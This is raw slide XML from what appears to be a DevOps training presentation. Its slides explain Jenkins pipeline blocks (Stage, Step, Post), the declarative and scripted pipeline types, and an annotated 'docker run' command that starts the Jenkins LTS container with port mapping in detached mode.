                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Stage</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">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2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>A stage block contains a series of steps in a pipeline.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">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6125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Step</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>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2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Step a block where we can perform command and action  for our build server</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>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6125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Post</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>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lnSpc>
                          <a:spcPct val="136666"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Post state can be defined to perform some action when our build is failed or succeeded</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>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358"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430225" y="545775"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2400"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Types of Jenkins Pipeline</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2187" name="Google Shape;2187;p358"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739700" y="2081325"/>
            <a:ext cx="8034600" cy="2480400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="525252"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="2743200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Poppins"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
                <a:ea typeface="Poppins"/>
                <a:cs typeface="Poppins"/>
                <a:sym typeface="Poppins"/>
              </a:rPr>
              <a:t> Declarative Pipeline</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Poppins"/>
              <a:ea typeface="Poppins"/>
              <a:cs typeface="Poppins"/>
              <a:sym typeface="Poppins"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="2743200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Poppins"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
                <a:ea typeface="Poppins"/>
                <a:cs typeface="Poppins"/>
                <a:sym typeface="Poppins"/>
              </a:rPr>
              <a:t>Scripted Pipeline</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Poppins"/>
              <a:ea typeface="Poppins"/>
              <a:cs typeface="Poppins"/>
              <a:sym typeface="Poppins"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2188" name="Google Shape;2188;p358"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876500" y="1333500"/>
            <a:ext cx="77883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50">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>There are two types of Jenkins pipeline code.</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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359"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="14577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320" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Jenkinsfile Ref</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2194" name="Google Shape;2194;p359"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382025" y="22394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320" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Jenkinsfile CICD Ref</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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p360"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382200" y="1692475"/>
            <a:ext cx="8520600" cy="2655600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -p </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hostport</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>containerport</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-d</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tag</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="0000CD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -p </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -d  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jenkins</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jenkins</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lts</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="0000CD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2200" name="Google Shape;2200;p360"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2684200" y="1096375"/>
            <a:ext cx="29895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38.242.223.70</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2201" name="Google Shape;2201;p360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3055825" y="1486325"/>
            <a:ext cx="1448100" cy="872700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2202" name="Google Shape;2202;p360"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6460975" y="933800"/>
            <a:ext cx="2247000" cy="55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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detached mode or</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Background mode</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2203" name="Google Shape;2203;p360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5937800" y="1560600"/>
            <a:ext cx="1448100" cy="872700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2204" name="Google Shape;2204;p360"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202525" y="325750"/>
            <a:ext cx="11010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HostIP</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2205" name="Google Shape;2205;p360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1932175" y="707675"/>
            <a:ext cx="798600" cy="546300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="8B008B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2206" name="Google Shape;2206;p360"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7454700" y="218700"/>
            <a:ext cx="1448101" cy="412787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2207" name="Google Shape;2207;p360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985150" y="2817825"/>
            <a:ext cx="525300" cy="1046400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2208" name="Google Shape;2208;p360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5937800" y="2803875"/>
            <a:ext cx="611100" cy="1074300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="9900FF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2209" name="Google Shape;2209;p360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7148600" y="2803875"/>
            <a:ext cx="611100" cy="1074300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="8B008B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2210" name="Google Shape;2210;p360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8227075" y="2803875"/>
            <a:ext cx="223500" cy="1079100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="0000CD"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2211" name="Google Shape;2211;p360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4058275" y="2861625"/>
            <a:ext cx="495900" cy="1021500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="FF00FF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2212" name="Google Shape;2212;p360"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4877600" y="4549650"/>
            <a:ext cx="2882100" cy="55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9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hub.docker.com account</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2213" name="Google Shape;2213;p360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5894625" y="4235625"/>
            <a:ext cx="0" cy="401100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="9900FF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2214" name="Google Shape;2214;p360"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3315625" y="4430600"/>
            <a:ext cx="1448100" cy="4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500">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port mapping</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:srgbClr val="006FC0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2215" name="Google Shape;2215;p360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5277738">
            <a:off x="3761234" y="3727695"/>
            <a:ext cx="556852" cy="956412"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd fmla="val 16200000" name="adj1"/>
              <a:gd fmla="val 5547086" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="stealth"/>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16" name="Google Shape;2216;p360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2303400" y="1963700"/>
            <a:ext cx="587700" cy="587700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2217" name="Google Shape;2217;p360"/>
